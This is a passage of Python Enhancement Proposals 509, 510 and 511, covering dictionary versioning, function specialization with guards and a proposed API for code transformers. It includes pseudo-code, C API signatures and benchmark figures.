Exposing the dictionary version at the Python level can lead to
false assumptions about performance. Checking dict.__version__ at
the Python level is not faster than a dictionary lookup. A dictionary
lookup in Python has a cost of 48.7 ns and checking the version has a
cost of 47.5 ns, the difference is only 1.2 ns (3%):
$ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd["33"] == 33'
10000000 loops, best of 3: 0.0487 usec per loop
$ python3.6 -m timeit -s 'd = {str(i):i for i in range(100)}' 'd.__version__ == 100'
10000000 loops, best of 3: 0.0475 usec per loop
The __version__ can wrap around on integer overflow. It is error
prone: using dict.__version__ <= guard_version is wrong,
dict.__version__ == guard_version must be used instead to reduce
the risk of bug on integer overflow (even if the integer overflow is
unlikely in practice).
Mandatory bikeshedding on the property name:
__cache_token__: name proposed by Alyssa Coghlan, name coming from
abc.get_cache_token().
__version__
__version_tag__
__timestamp__
Add a version to each dict entry
A single version per dictionary requires keeping a strong reference to
the value, which can keep the value alive longer than expected. If we add
also a version per dictionary entry, the guard can only store the entry
version (a simple integer) to avoid the strong reference to the value:
only strong references to the dictionary and to the key are needed.
Changes: add a me_version_tag field to the PyDictKeyEntry
structure, the field has the C type PY_UINT64_T. When a key is
created or modified, the entry version is set to the dictionary version
which is incremented at any change (create, modify, delete).
Pseudo-code of a fast guard to check if a dictionary key was modified
using hypothetical dict_get_version(dict) and
dict_get_entry_version(dict, key) functions:

UNSET = object()

class GuardDictKey:
    def __init__(self, dict, key):
        self.dict = dict
        self.key = key
        self.dict_version = dict_get_version(dict)
        self.entry_version = dict_get_entry_version(dict, key)

    def check(self):
        """Return True if the dictionary entry did not change
        and the dictionary was not replaced."""

        # read the version of the dictionary
        dict_version = dict_get_version(self.dict)
        if dict_version == self.dict_version:
            # Fast-path: dictionary lookup avoided
            return True

        # lookup in the dictionary to read the entry version
        entry_version = dict_get_entry_version(self.dict, self.key)
        if entry_version == self.entry_version:
            # another key was modified:
            # cache the new dictionary version
            self.dict_version = dict_version
            self.entry_version = entry_version
            return True

        # the key was modified
        return False
The main drawback of this option is the impact on the memory footprint.
It increases the size of each dictionary entry, so the overhead depends
on the number of buckets (dictionary entries, used or not used). For
example, it increases the size of each dictionary entry by 8 bytes on
64-bit systems.
In Python, the memory footprint matters and the trend is to reduce it.
Examples:
PEP 393 – Flexible String Representation
PEP 412 – Key-Sharing Dictionary
Add a new dict subtype
Add a new verdict type, subtype of dict. When guards are needed,
use the verdict for namespaces (module namespace, type namespace,
instance namespace, etc.) instead of dict.
Leave the dict type unchanged to not add any overhead (CPU, memory
footprint) when guards are not used.
Technical issue: a lot of C code in the wild, including the CPython
core, expects the exact dict type. Issues:
exec() requires a dict for globals and locals. A lot of code
uses globals={}. It is not possible to replace the dict with a
dict subtype because the caller expects the globals parameter
to be modified in place (dict is mutable); see the short illustration
after this list.
C functions call PyDict_xxx() functions directly, instead of calling
PyObject_xxx() functions when the object is a dict subtype
The PyDict_CheckExact() check fails on dict subtypes, whereas some
functions require the exact dict type.
Python/ceval.c does not completely support dict subtypes for
namespaces
The exec() issue is a blocker issue.
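A minimal illustration of that constraint (not from the PEP): callers pass a plain dict and rely on that same object being mutated in place, so it cannot be transparently swapped for a verdict copy:
namespace = {}
exec("x = 1 + 1", namespace)
assert namespace["x"] == 2   # the caller inspects its *own* dict afterwards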
Other issues:
The garbage collector has special code to “untrack” dict
instances. If a dict subtype is used for namespaces, the garbage
collector can be unable to break some reference cycles.
Some functions have a fast-path for dict which would not be taken
for dict subtypes, and so it would make Python a little bit
slower.
Prior Art
Method cache and type version tag
In 2007, Armin Rigo wrote a patch to implement a cache of methods. It
was merged into Python 2.6. The patch adds a “type attribute cache
version tag” (tp_version_tag) and a “valid version tag” flag to
types (the PyTypeObject structure).
The type version tag is not exposed at the Python level.
The version tag has the C type unsigned int. The cache is a global
hash table of 4096 entries, shared by all types. The cache is global to
“make it fast, have a deterministic and low memory footprint, and be
easy to invalidate”. Each cache entry has a version tag. A global
version tag is used to create the next version tag; it also has the C
type unsigned int.
By default, a type has its “valid version tag” flag cleared to indicate
that the version tag is invalid. When the first method of the type is
cached, the version tag and the “valid version tag” flag are set. When a
type is modified, the “valid version tag” flag of the type and its
subclasses is cleared. Later, when a cache entry of these types is used,
the entry is removed because its version tag is outdated.
On integer overflow, the whole cache is cleared and the global version
tag is reset to 0.
See Method cache (issue #1685986) and Armin’s method cache
optimization updated for Python 2.6 (issue #1700288).
Globals / builtins cache
In 2010, Antoine Pitrou proposed a Globals / builtins cache (issue
#10401) which adds a private
ma_version field to the PyDictObject structure (dict type);
the field has the C type Py_ssize_t.
The patch adds a “global and builtin cache” to functions and frames, and
changes LOAD_GLOBAL and STORE_GLOBAL instructions to use the
cache.
The change on the PyDictObject structure is very similar to this
PEP.
Cached globals+builtins lookup
In 2006, Andrea Griffini proposed a patch implementing a Cached
globals+builtins lookup optimization. The patch adds a private
timestamp field to the PyDictObject structure (dict type);
the field has the C type size_t.
Thread on python-dev: About dictionary lookup caching
(December 2006).
Guard against changing dict during iteration
In 2013, Serhiy Storchaka proposed Guard against changing dict during
iteration (issue #19332) which
adds a ma_count field to the PyDictObject structure (dict
type); the field has the C type size_t. This field is incremented
when the dictionary is modified.
PySizer
PySizer: a memory profiler for Python,
Google Summer of Code 2005 project by Nick Smallbone.
This project has a patch for CPython 2.4 which adds key_time and
value_time fields to dictionary entries. It uses a global
process-wide counter for dictionaries, incremented each time that a
dictionary is modified. The times are used to decide when child objects
first appeared in their parent objects.
Discussion
Thread on the mailing lists:
python-dev: Updated PEP 509
python-dev: RFC: PEP 509: Add a private version to dict
python-dev: PEP 509: Add a private version to dict
(January 2016)
python-ideas: RFC: PEP: Add dict.__version__
(January 2016)
Acceptance
The PEP was accepted on 2016-09-07 by Guido van Rossum.
The PEP implementation has since been committed to the repository.
Copyright
This document has been placed in the public domain.
| Superseded | PEP 509 – Add a private version to dict | Standards Track | Add a new private version to the builtin dict type, incremented at
each dictionary creation and at each dictionary change, to implement
fast guards on namespaces. |
PEP 510 – Specialize functions with guards
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
04-Jan-2016
Python-Version:
3.6
Table of Contents
Rejection Notice
Abstract
Rationale
Python semantics
Why not a JIT compiler?
Examples
Hypothetical myoptimizer module
Using bytecode
Using builtin function
Choose the specialized code
Changes
Function guard
Specialized code
Function methods
PyFunction_Specialize
PyFunction_GetSpecializedCodes
PyFunction_GetSpecializedCode
PyFunction_RemoveSpecialized
PyFunction_RemoveAllSpecialized
Benchmark
Implementation
Other implementations of Python
Discussion
Copyright
Rejection Notice
This PEP was rejected by its author since the design didn’t show any
significant speedup, but also because of the lack of time to implement
the most advanced and complex optimizations.
Abstract
Add functions to the Python C API to specialize pure Python functions:
add specialized codes with guards. This makes it possible to implement
static optimizers respecting the Python semantics.
Rationale
Python semantics
Python is hard to optimize because almost everything is mutable: builtin
functions, function code, global variables, local variables, … can be
modified at runtime. Implementing optimizations respecting the Python
semantics requires detecting when “something changes”; we will call these
checks “guards”.
This PEP proposes to add a public API to the Python C API to add
specialized codes with guards to a function. When the function is
called, a specialized code is used if nothing changed; otherwise, the
original bytecode is used.
Even if guards help to respect most parts of the Python semantics, it’s
hard to optimize Python without making subtle changes on the exact
behaviour. CPython has a long history and many applications rely on
implementation details. A compromise must be found between “everything
is mutable” and performance.
Writing an optimizer is out of the scope of this PEP.
Why not a JIT compiler?
There are multiple JIT compilers for Python actively developed:
PyPy
Pyston
Numba
Pyjion
Numba is specific to numerical computation. Pyston and Pyjion are still
young. PyPy is the most complete Python interpreter; it is generally
faster than CPython in micro- and many macro-benchmarks and has very
good compatibility with CPython (it respects the Python semantics).
There are still issues with Python JIT compilers which prevent them from
being widely used instead of CPython.
Many popular libraries like numpy, PyGTK, PyQt, PySide and wxPython are
implemented in C or C++ and use the Python C API. To have a small memory
footprint and better performance, Python JIT compilers do not use
reference counting (relying on a faster garbage collector instead), do
not use the C structures of CPython objects and manage memory
allocations differently. PyPy has a cpyext module which emulates the
Python C API, but it has worse performance than CPython and does not
support the full Python C API.
New features are first developed in CPython. In January 2016, the
latest CPython stable version is 3.5, whereas PyPy only supports Python
2.7 and 3.2, and Pyston only supports Python 2.7.
Even if PyPy has a very good compatibility with Python, some modules are
still not compatible with PyPy: see PyPy Compatibility Wiki. The incomplete
support of the Python C API is part of this problem. There are also
subtle differences between PyPy and CPython like reference counting:
object destructors are always called in PyPy, but can be called “later”
than in CPython. Using context managers helps to control when resources
are released.
Even if PyPy is much faster than CPython in a wide range of benchmarks,
some users still report worse performances than CPython on some specific
use cases or unstable performances.
When Python is used as a scripting language for programs that run for
less than a minute, JIT compilers can be slower because their startup
time is higher and the JIT compiler takes time to optimize the code. For
example, most Mercurial commands take a few seconds.
Numba now supports ahead-of-time compilation, but it requires a
decorator to specify argument types and it only supports numerical types.
CPython 3.5 has almost no optimization: the peephole optimizer only
implements basic optimizations. A static compiler is a compromise
between CPython 3.5 and PyPy.
Note
There was also the Unladen Swallow project, but it was abandoned in
2011.
Examples
The following examples are not written to show powerful optimizations
promising large speedups, but to be short and easy to understand, just
to explain the principle.
Hypothetical myoptimizer module
Examples in this PEP use a hypothetical myoptimizer module which
provides the following functions and types:
specialize(func, code, guards): add the specialized code code
with guards guards to the function func
get_specialized(func): get the list of specialized codes as a list
of (code, guards) tuples where code is a callable or code object
and guards is a list of guards
GuardBuiltins(name): guard watching for
builtins.__dict__[name] and globals()[name]. The guard fails
if builtins.__dict__[name] is replaced, or if globals()[name]
is set.
Using bytecode
Add specialized bytecode where the call to the pure builtin function
chr(65) is replaced with its result "A":
import myoptimizer

def func():
    return chr(65)

def fast_func():
    return "A"

myoptimizer.specialize(func, fast_func.__code__,
                       [myoptimizer.GuardBuiltins("chr")])
del fast_func
Example showing the behaviour of the guard:
print("func(): %s" % func())
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
print()
import builtins
builtins.chr = lambda obj: "mock"
print("func(): %s" % func())
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
Output:
func(): A
#specialized: 1
func(): mock
#specialized: 0
The first call uses the specialized bytecode which returns the string
"A". The second call removes the specialized code because the
builtin chr() function was replaced, and executes the original
bytecode calling chr(65).
On a microbenchmark, calling the specialized bytecode takes 88 ns,
whereas the original function takes 145 ns (+57 ns): 1.6 times as fast.
Using builtin function
Add the C builtin chr() function as the specialized code instead of
a bytecode calling chr(obj):
import myoptimizer

def func(arg):
    return chr(arg)

myoptimizer.specialize(func, chr,
                       [myoptimizer.GuardBuiltins("chr")])
Example showing the behaviour of the guard:
print("func(65): %s" % func(65))
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
print()
import builtins
builtins.chr = lambda obj: "mock"
print("func(65): %s" % func(65))
print("#specialized: %s" % len(myoptimizer.get_specialized(func)))
Output:
func(65): A
#specialized: 1
func(65): mock
#specialized: 0
The first call calls the C builtin chr() function (without creating
a Python frame). The second call removes the specialized code because
the builtin chr() function was replaced, and executes the original
bytecode.
On a microbenchmark, calling the C builtin takes 95 ns, whereas the
original bytecode takes 155 ns (+60 ns): 1.6 times as fast. Calling
chr(65) directly takes 76 ns.
Choose the specialized code
Pseudo-code to choose the specialized code to call a pure Python
function:
def call_func(func, args, kwargs):
    specialized = myoptimizer.get_specialized(func)
    nspecialized = len(specialized)

    index = 0
    while index < nspecialized:
        specialized_code, guards = specialized[index]

        check = 0
        for guard in guards:
            check = guard(args, kwargs)
            if check:
                break

        if not check:
            # all guards succeeded:
            # use the specialized code
            return specialized_code
        elif check == 1:
            # a guard failed temporarily:
            # try the next specialized code
            index += 1
        else:
            assert check == 2
            # a guard will always fail:
            # remove the specialized code
            del specialized[index]
            nspecialized -= 1

    # if a guard of each specialized code failed, or if the function
    # has no specialized code, use original bytecode
    code = func.__code__
Changes
Changes to the Python C API:
Add a PyFuncGuardObject object and a PyFuncGuard_Type type
Add a PySpecializedCode structure
Add the following fields to the PyFunctionObject structure:
Py_ssize_t nb_specialized;
PySpecializedCode *specialized;
Add function methods:
PyFunction_Specialize()
PyFunction_GetSpecializedCodes()
PyFunction_GetSpecializedCode()
PyFunction_RemoveSpecialized()
PyFunction_RemoveAllSpecialized()
None of these functions and types are exposed at the Python level.
All these additions are explicitly excluded from the stable ABI.
When a function code is replaced (func.__code__ = new_code), all
specialized codes and guards are removed.
Function guard
Add a function guard object:
typedef struct {
    PyObject ob_base;
    int (*init) (PyObject *guard, PyObject *func);
    int (*check) (PyObject *guard, PyObject **stack, int na, int nk);
} PyFuncGuardObject;
The init() function initializes a guard:
Return 0 on success
Return 1 if the guard will always fail: PyFunction_Specialize()
must ignore the specialized code
Raise an exception and return -1 on error
The check() function checks a guard:
Return 0 on success
Return 1 if the guard failed temporarily
Return 2 if the guard will always fail: the specialized code must
be removed
Raise an exception and return -1 on error
stack is an array of arguments: indexed arguments followed by (key,
value) pairs of keyword arguments. na is the number of indexed
arguments. nk is the number of keyword arguments: the number of (key,
value) pairs. stack contains na + nk * 2 objects.
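For illustration, the layout of the stack argument for a call f(1, 2, x=3) could be sketched in Python as follows (this mirrors the C convention described above, it is not actual C API usage):
stack = [1, 2, "x", 3]   # indexed arguments, then flattened (key, value) pairs
na = 2                   # number of indexed arguments
nk = 1                   # number of keyword arguments
assert len(stack) == na + nk * 2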
Specialized code
Add a specialized code structure:
typedef struct {
    PyObject *code;        /* callable or code object */
    Py_ssize_t nb_guard;
    PyObject **guards;     /* PyFuncGuardObject objects */
} PySpecializedCode;
Function methods
PyFunction_Specialize
Add a function method to specialize the function, add a specialized code
with guards:
int PyFunction_Specialize(PyObject *func,
PyObject *code, PyObject *guards)
If code is a Python function, the code object of the code function
is used as the specialized code. The specialized Python function must
have the same parameter defaults, the same keyword parameter defaults,
and must not have specialized code.
If code is a Python function or a code object, a new code object is
created and the code name and first line number of the code object of
func are copied. The specialized code must have the same cell
variables and the same free variables.
Result:
Return 0 on success
Return 1 if the specialization has been ignored
Raise an exception and return -1 on error
PyFunction_GetSpecializedCodes
Add a function method to get the list of specialized codes:
PyObject* PyFunction_GetSpecializedCodes(PyObject *func)
Return a list of (code, guards) tuples where code is a callable or
code object and guards is a list of PyFuncGuard objects. Raise an
exception and return NULL on error.
PyFunction_GetSpecializedCode
Add a function method checking guards to choose a specialized code:
PyObject* PyFunction_GetSpecializedCode(PyObject *func,
PyObject **stack,
int na, int nk)
See check() function of guards for stack, na and nk arguments.
Return a callable or a code object on success. Raise an exception and
return NULL on error.
PyFunction_RemoveSpecialized
Add a function method to remove a specialized code with its guards by
its index:
int PyFunction_RemoveSpecialized(PyObject *func, Py_ssize_t index)
Return 0 on success or if the index does not exist. Raise an exception and
return -1 on error.
PyFunction_RemoveAllSpecialized
Add a function method to remove all specialized codes and guards of a
function:
int PyFunction_RemoveAllSpecialized(PyObject *func)
Return 0 on success. Raise an exception and return -1 if func is not
a function.
Benchmark
Microbenchmark on python3.6 -m timeit -s 'def f(): pass' 'f()' (best
of 3 runs):
Original Python: 79 ns
Patched Python: 79 ns
According to this microbenchmark, the changes have no overhead when
calling a Python function without specialization.
Implementation
The issue #26098: PEP 510: Specialize functions with guards contains a patch which implements
this PEP.
Other implementations of Python
This PEP only contains changes to the Python C API; the Python API is
unchanged. Other implementations of Python are free to not implement the
new additions, or to implement the added functions as no-ops:
PyFunction_Specialize(): always return 1 (the specialization
has been ignored)
PyFunction_GetSpecializedCodes(): always return an empty list
PyFunction_GetSpecializedCode(): return the function code object,
as the existing PyFunction_GET_CODE() macro
Discussion
Thread on the python-ideas mailing list: RFC: PEP: Specialized
functions with guards.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 510 – Specialize functions with guards | Standards Track | Add functions to the Python C API to specialize pure Python functions:
add specialized codes with guards. It allows to implement static
optimizers respecting the Python semantics. |
PEP 511 – API for code transformers
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
04-Jan-2016
Python-Version:
3.6
Table of Contents
Rejection Notice
Abstract
Rationale
Usage 1: AST optimizer
Usage 2: Preprocessor
Usage 3: Disable all optimization
Usage 4: Write new bytecode optimizers in Python
Use Cases
Interactive interpreter
Build a transformed package
Install a package containing transformed .pyc files
Build .pyc files when installing a package
Execute transformed code
Code transformer API
code_transformer() method
ast_transformer() method
Changes
API to get/set code transformers
Optimizer tag
Peephole optimizer
AST enhancements
Examples
.pyc filenames
Bytecode transformer
AST transformer
Other Python implementations
Discussion
Prior Art
AST optimizers
Python Preprocessors
Bytecode transformers
Copyright
Rejection Notice
This PEP was rejected by its author.
This PEP was seen as blessing new Python-like programming languages
which are close but incompatible with the regular Python language. It
was decided to not promote syntaxes incompatible with Python.
This PEP was also seen as a nice tool to experiment with new Python
features, but it is already possible to experiment with them without the
PEP, using only importlib hooks. If a feature becomes useful, it should
be directly part of Python, instead of depending on a third party Python
module.
Finally, this PEP was driven by the FAT Python optimization project
which was abandoned in 2016, since it was not possible to show any
significant speedup, but also because of the lack of time to implement
the most advanced and complex optimizations.
Abstract
Propose an API to register bytecode and AST transformers. Also add an -o
OPTIM_TAG command line option to change .pyc filenames; -o
noopt disables the peephole optimizer. Raise an ImportError
exception on import if the .pyc file is missing and the code
transformers required to transform the code are missing. Code
transformers are not needed to execute code transformed ahead of time
(loaded from .pyc files).
Rationale
Python does not provide a standard way to transform the code. Projects
transforming the code use various hooks. The MacroPy project uses an
import hook: it adds its own module finder in sys.meta_path to
hook its AST transformer. Another option is to monkey-patch the
builtin compile() function. There are even more options to
hook a code transformer.
Python 3.4 added a compile_source() method to
importlib.abc.SourceLoader. But code transformation is wider than
just importing modules; see the use cases described below.
Writing an optimizer or a preprocessor is out of the scope of this PEP.
Usage 1: AST optimizer
Transforming an Abstract Syntax Tree (AST) is a convenient
way to implement an optimizer. It’s easier to work on the AST than on
the bytecode: the AST contains more information and is more high level.
Since the optimization can be done ahead of time, complex but slow
optimizations can be implemented.
Example of optimizations which can be implemented with an AST optimizer:
Copy propagation:
replace x=1; y=x with x=1; y=1
Constant folding:
replace 1+1 with 2 (see the sketch after this list)
Dead code elimination
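As a toy sketch of the constant folding case (illustrative only, not part of the PEP; it uses the Python 3.6-era ast.Num nodes), an ast.NodeTransformer folding additions of two number literals could look like:
import ast

class FoldAdd(ast.NodeTransformer):
    """Fold additions of two number literals, e.g. 1 + 1 -> 2."""
    def visit_BinOp(self, node):
        self.generic_visit(node)   # fold children first
        if (isinstance(node.op, ast.Add)
                and isinstance(node.left, ast.Num)
                and isinstance(node.right, ast.Num)):
            return ast.copy_location(ast.Num(n=node.left.n + node.right.n), node)
        return node

tree = ast.parse("x = 1 + 1")
tree = ast.fix_missing_locations(FoldAdd().visit(tree))
namespace = {}
exec(compile(tree, "<folded>", "exec"), namespace)
assert namespace["x"] == 2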
Using guards (see PEP 510), it is possible to
implement a much wider choice of optimizations. Examples:
Simplify iterable: replace range(3) with (0, 1, 2) when used
as iterable
Loop unrolling
Call pure builtins: replace len("abc") with 3
Copy used builtin symbols to constants
See also optimizations implemented in fatoptimizer,
a static optimizer for Python 3.6.
The following issues can be implemented with an AST optimizer:
Issue #1346238: A constant folding
optimization pass for the AST
Issue #2181:
optimize out local variables at end of function
Issue #2499:
Fold unary + and not on constants
Issue #4264:
Patch: optimize code to use LIST_APPEND instead of calling list.append
Issue #7682:
Optimisation of if with constant expression
Issue #10399: AST
Optimization: inlining of function calls
Issue #11549:
Build-out an AST optimizer, moving some functionality out of the
peephole optimizer
Issue #17068:
peephole optimization for constant strings
Issue #17430:
missed peephole optimization
Usage 2: Preprocessor
A preprocessor can be easily implemented with an AST transformer. A
preprocessor has many different usages.
Some examples:
Remove debug code like assertions and logs to make the code faster
to run in production.
Tail-call Optimization
Add profiling code
Lazy evaluation:
see lazy_python
(bytecode transformer) and lazy macro of MacroPy (AST transformer)
Change dictionary literals into collections.OrderedDict instances
Declare constants: see @asconstants of codetransformer
Domain Specific Language (DSL) like SQL queries. The
Python language itself doesn’t need to be modified. Previous attempts
to implement DSLs for SQL, like PEP 335 - Overloadable Boolean
Operators, were rejected.
Pattern Matching of functional languages
String Interpolation, but PEP 498
was merged into Python
3.6.
MacroPy has a long list of
examples and use cases.
This PEP does not add any new code transformer. Using a code transformer
will require an external module, which must be registered manually.
See also PyXfuscator: Python
obfuscator, deobfuscator, and user-assisted decompiler.
Usage 3: Disable all optimization
Ned Batchelder asked to add an option to disable the peephole optimizer
because it makes code coverage more difficult to implement. See the
discussion on the python-ideas mailing list: Disable all peephole
optimizations.
This PEP adds a new -o noopt command line option to disable the
peephole optimizer. In Python, it’s as easy as:
sys.set_code_transformers([])
It will fix the Issue #2506: Add
mechanism to disable optimizations.
Usage 4: Write new bytecode optimizers in Python
Python 3.6 optimizes the code using a peephole optimizer. By
definition, a peephole optimizer has a narrow view of the code and so
can only implement basic optimizations. The optimizer rewrites the
bytecode. It is difficult to enhance it, because it is written in C.
With this PEP, it becomes possible to implement a new bytecode optimizer
in pure Python and experiment with new optimizations.
Some optimizations are easier to implement on the AST like constant
folding, but optimizations on the bytecode are still useful. For
example, when the AST is compiled to bytecode, useless jumps can be
emitted because the compiler is naive and does not try to optimize
anything.
Use Cases
This section gives examples of use cases explaining when and how code
transformers will be used.
Interactive interpreter
It will be possible to use code transformers with the interactive
interpreter which is popular in Python and commonly used to demonstrate
Python.
The code is transformed at runtime and so the interpreter can be slower
when expensive code transformers are used.
Build a transformed package
It will be possible to build a package of the transformed code.
A transformer can have a configuration. The configuration is not stored
in the package.
All .pyc files of the package must be transformed with the same code
transformers and the same transformers configuration.
It is possible to build different .pyc files using different
optimizer tags. Example: fat for the default configuration and
fat_inline for a different configuration with function inlining
enabled.
A package can contain .pyc files with different optimizer tags.
Install a package containing transformed .pyc files
It will be possible to install a package which contains transformed
.pyc files.
All .pyc files with any optimizer tag contained in the package are
installed, not only for the current optimizer tag.
Build .pyc files when installing a package
If a package does not contain any .pyc files of the current
optimizer tag (or some .pyc files are missing), the .pyc files are
created during the installation.
Code transformers of the optimizer tag are required. Otherwise, the
installation fails with an error.
Execute transformed code
It will be possible to execute transformed code.
Raise an ImportError exception on import if the .pyc file of the
current optimizer tag is missing and the code transformers required to
transform the code are missing.
The interesting point here is that code transformers are not needed to
execute the transformed code if all required .pyc files are already
available.
Code transformer API
A code transformer is a class with ast_transformer() and/or
code_transformer() methods (API described below) and a name
attribute.
For efficiency, do not define a code_transformer() or
ast_transformer() method if it does nothing.
The name attribute (str) must be a short string used to identify
an optimizer. It is used to build a .pyc filename. The name must not
contain dots ('.'), dashes ('-') or directory separators: dots
are used to separate fields in a .pyc filename and dashes are used
to join code transformer names to build the optimizer tag.
Note
It would be nice to pass the fully qualified name of a module in the
context when an AST transformer is used to transform a module on
import, but it looks like the information is not available in
PyParser_ASTFromStringObject().
code_transformer() method
Prototype:
def code_transformer(self, code, context):
    ...
    new_code = ...
    ...
    return new_code
Parameters:
code: code object
context: an object with an optimize attribute (int), the optimization
level (0, 1 or 2). The value of the optimize attribute comes from the
optimize parameter of the compile() function; it is equal to
sys.flags.optimize by default.
Each implementation of Python can add extra attributes to context. For
example, on CPython, context will also have the following attribute:
interactive (bool): true if in interactive mode
XXX add more flags?
XXX replace flags int with a sub-namespace, or with specific attributes?
The method must return a code object.
The code transformer is run after the compilation to bytecode.
ast_transformer() method
Prototype:
def ast_transformer(self, tree, context):
    ...
    return tree
Parameters:
tree: an AST tree
context: an object with a filename attribute (str)
It must return an AST tree. It can modify the AST tree in place, or
create a new AST tree.
The AST transformer is called after the creation of the AST by the
parser and before the compilation to bytecode. New attributes may be
added to context in the future.
Changes
In short, add:
-o OPTIM_TAG command line option
sys.implementation.optim_tag
sys.get_code_transformers()
sys.set_code_transformers(transformers)
ast.PyCF_TRANSFORMED_AST
API to get/set code transformers
Add new functions to register code transformers:
sys.set_code_transformers(transformers): set the list of code
transformers and update sys.implementation.optim_tag
sys.get_code_transformers(): get the list of code
transformers.
The order of code transformers matters. Running transformer A and then
transformer B can give a different output than running transformer B and
then transformer A.
Example to prepend a new code transformer:
transformers = sys.get_code_transformers()
transformers.insert(0, new_cool_transformer)
sys.set_code_transformers(transformers)
All AST transformers are run sequentially (e.g. the second transformer
gets the output of the first transformer as its input), and then all bytecode
transformers are run sequentially.
Optimizer tag
Changes:
Add sys.implementation.optim_tag (str): optimization tag.
The default optimization tag is 'opt'.
Add a new -o OPTIM_TAG command line option to set
sys.implementation.optim_tag.
Changes on importlib:
importlib uses sys.implementation.optim_tag to build the
.pyc filename when importing modules, instead of always using
opt. Also remove the special case for the optimizer level 0
with the default optimizer tag 'opt' to simplify the code.
When loading a module, if the .pyc file is missing but the .py
is available, the .py is only used if the registered code transformers
have the same optimizer tag as the current tag; otherwise an ImportError
exception is raised.
Pseudo-code of a use_py() function to decide if a .py file can
be compiled to import a module:
def transformers_tag():
    transformers = sys.get_code_transformers()
    if not transformers:
        return 'noopt'
    return '-'.join(transformer.name
                    for transformer in transformers)

def use_py():
    return (transformers_tag() == sys.implementation.optim_tag)
The order of sys.get_code_transformers() matters. For example, the
fat transformer followed by the pythran transformer gives the
optimizer tag fat-pythran.
The behaviour of the importlib module is unchanged with the default
optimizer tag ('opt').
Peephole optimizer
By default, sys.implementation.optim_tag is opt and
sys.get_code_transformers() returns a list of one code transformer:
the peephole optimizer (optimize the bytecode).
Use -o noopt to disable the peephole optimizer. In this case, the
optimizer tag is noopt and no code transformer is registered.
Using the -o opt option has no effect.
AST enhancements
Enhancements to simplify the implementation of AST transformers:
Add a new compiler flag PyCF_TRANSFORMED_AST to get the
transformed AST. PyCF_ONLY_AST returns the AST before the
transformers.
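For comparison, a short sketch of the existing flag and the proposed one (PyCF_TRANSFORMED_AST is hypothetical, it does not exist in CPython):
import ast

# Existing behaviour: PyCF_ONLY_AST returns the AST produced by the parser.
tree = compile("x = 1 + 1", "<example>", "exec", flags=ast.PyCF_ONLY_AST)
assert isinstance(tree, ast.Module)

# Proposed behaviour (hypothetical flag from this PEP): return the AST after
# all registered AST transformers have run.
# transformed = compile("x = 1 + 1", "<example>", "exec",
#                       flags=ast.PyCF_TRANSFORMED_AST)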
Examples
.pyc filenames
Example of .pyc filenames of the os module.
With the default optimizer tag 'opt':

    .pyc filename              Optimization level
    os.cpython-36.opt-0.pyc    0
    os.cpython-36.opt-1.pyc    1
    os.cpython-36.opt-2.pyc    2

With the 'fat' optimizer tag:

    .pyc filename              Optimization level
    os.cpython-36.fat-0.pyc    0
    os.cpython-36.fat-1.pyc    1
    os.cpython-36.fat-2.pyc    2
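A short sketch of how such filenames are composed (pyc_filename() is a hypothetical helper written for illustration, not a proposed API):
def pyc_filename(module, optim_tag, optimization, impl_tag="cpython-36"):
    # <module>.<implementation tag>.<optimizer tag>-<optimization level>.pyc
    return "{}.{}.{}-{}.pyc".format(module, impl_tag, optim_tag, optimization)

assert pyc_filename("os", "opt", 1) == "os.cpython-36.opt-1.pyc"
assert pyc_filename("os", "fat", 2) == "os.cpython-36.fat-2.pyc"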
Bytecode transformer
Scary bytecode transformer replacing all strings with
"Ni! Ni! Ni!":
import sys
import types

class BytecodeTransformer:
    name = "knights_who_say_ni"

    def code_transformer(self, code, context):
        consts = ['Ni! Ni! Ni!' if isinstance(const, str) else const
                  for const in code.co_consts]
        return types.CodeType(code.co_argcount,
                              code.co_kwonlyargcount,
                              code.co_nlocals,
                              code.co_stacksize,
                              code.co_flags,
                              code.co_code,
                              tuple(consts),
                              code.co_names,
                              code.co_varnames,
                              code.co_filename,
                              code.co_name,
                              code.co_firstlineno,
                              code.co_lnotab,
                              code.co_freevars,
                              code.co_cellvars)

# replace existing code transformers with the new bytecode transformer
sys.set_code_transformers([BytecodeTransformer()])

# execute code which will be transformed by code_transformer()
exec("print('Hello World!')")
Output:
Ni! Ni! Ni!
AST transformer
Similarly to the bytecode transformer example, the AST transformer also
replaces all strings with "Ni! Ni! Ni!":
import ast
import sys

class KnightsWhoSayNi(ast.NodeTransformer):
    def visit_Str(self, node):
        node.s = 'Ni! Ni! Ni!'
        return node

class ASTTransformer:
    name = "knights_who_say_ni"

    def __init__(self):
        self.transformer = KnightsWhoSayNi()

    def ast_transformer(self, tree, context):
        self.transformer.visit(tree)
        return tree

# replace existing code transformers with the new AST transformer
sys.set_code_transformers([ASTTransformer()])

# execute code which will be transformed by ast_transformer()
exec("print('Hello World!')")
Output:
Ni! Ni! Ni!
Other Python implementations
PEP 511 should be implemented by all Python implementations, but the
bytecode and the AST are not standardized.
Note that even between minor versions of CPython, there are changes to
the AST API, but only minor ones. It is quite easy to write an AST
transformer which works on Python 2.7 and Python 3.5, for example.
Discussion
[Python-ideas] PEP 511: API for code transformers
(January 2016)
[Python-Dev] AST optimizer implemented in Python
(August 2012)
Prior Art
AST optimizers
The Issue #17515 “Add sys.setasthook() to allow to use a custom AST
optimizer” was a first attempt at an API for code transformers, but
specific to the AST.
In 2015, Victor Stinner wrote the fatoptimizer project, an AST optimizer
specializing functions using guards.
In 2014, Kevin Conway created the PyCC
optimizer.
In 2012, Victor Stinner wrote the astoptimizer project, an AST optimizer
implementing various optimizations. Most interesting optimizations break
the Python semantics since no guard is used to disable optimization if
something changes.
In 2011, Eugene Toder proposed to rewrite some peephole optimizations in
a new AST optimizer: issue #11549, Build-out an AST optimizer, moving
some functionality out of the peephole optimizer. The patch adds ast.Lit (it
was proposed to rename it to ast.Literal).
Python Preprocessors
MacroPy: MacroPy is an
implementation of Syntactic Macros in the Python Programming Language.
MacroPy provides a mechanism for user-defined functions (macros) to
perform transformations on the abstract syntax tree (AST) of a Python
program at import time.
pypreprocessor: C-style
preprocessor directives in Python, like #define and #ifdef
Bytecode transformers
codetransformer:
Bytecode transformers for CPython inspired by the ast module’s
NodeTransformer.
byteplay: Byteplay lets you
